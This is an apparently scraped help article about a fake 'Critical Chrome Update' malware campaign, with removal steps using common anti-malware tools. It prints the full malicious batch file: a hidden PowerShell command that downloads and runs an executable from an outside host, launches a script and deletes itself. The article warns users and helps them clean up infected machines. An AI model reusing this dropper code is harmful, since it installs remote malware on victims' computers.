How to fix the Critical Chrome Update Virus Malware Attack
The Critical Chrome Update Malware Attack has been going around and getting through many antivirus solutions. Do not click Download now button.
What does this do a brief analysis?
The download now button downloads the following chrome_update.bat file
Full analysis of this payload chrome_update.bat[1] at Payload Security.
More information about install_flash.js< small>[2] at Malwr.com.
2. Run Bleeping Computer's Rkill[5]
3. Run Malwarebytes[6]
4. Run Hitman Pro[7]
5. Run Windows Defender[8] or Windows Security Essentials[9] for Win 7 or less.
6. Run your Anti-Virus Solution in Deep Scan Mode
What does this do a brief analysis?
The download now button downloads the following chrome_update.bat file
- The script attempts to run using a Powershell command to downloads a file .dat and renames it into a randomly named .exe file.
- Which then runs this file in the background, and attempts to injection script in current running processes.
- Then you are notified that the "Update Complete" with an OK dissipate button.
- By saying click Ok, your installing the install_flash.js which contains VB script.
chrome_update.bat contents
1 2 3 4 5 6 7 8 9 10 | @echo off echo a=new ActiveXObject('Wscript.Shell'); a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\16330788701ac441736751e3ee3c6996.exe'; (New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d); Start-Process $d; [System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false); >"%temp%\install_flash.js" start /min "" wscript.exe "%temp%\install_flash.js" DEL "%~f0" |
Full analysis of this payload chrome_update.bat[1] at Payload Security.
More information about install_flash.js< small>[2] at Malwr.com.
What to do if you did click Download Now button?
1. Run Malwarebytes Adwcleaner and JRT[3][4]
2. Run Bleeping Computer's Rkill[5]
3. Run Malwarebytes[6]
4. Run Hitman Pro[7]
5. Run Windows Defender[8] or Windows Security Essentials[9] for Win 7 or less.
6. Run your Anti-Virus Solution in Deep Scan Mode
5. Clear your Chrome Cache
Open Chrome.
- On your browser toolbar, click M ore
.
- Point to More tools, and then click Clear browsing data.
- In the "Clear browsing data" box, click the check box only for Cached images and files.
- Use the menu at the top to select the amount of data that you want to delete. Choose beginning of time to delete everything.
- Click Clear browsing data.
References
- ^ chrome_update.bat (www.hybrid-analysis.com)
- ^ install_flash.js (malwr.com)
- ^ Adwcleaner (www.malwarebytes.com)
- ^ JRT (www.malwarebytes.com)
- ^ Rkill (www.bleepingcomputer.com)
- ^ Malwarebytes (www.malwarebytes.com)
- ^ Hitman Pro (www.hitmanpro.com)
- ^ Windows Defender (www.microsoft.com)
- ^ Windows Security Essentials (support.microsoft.com)
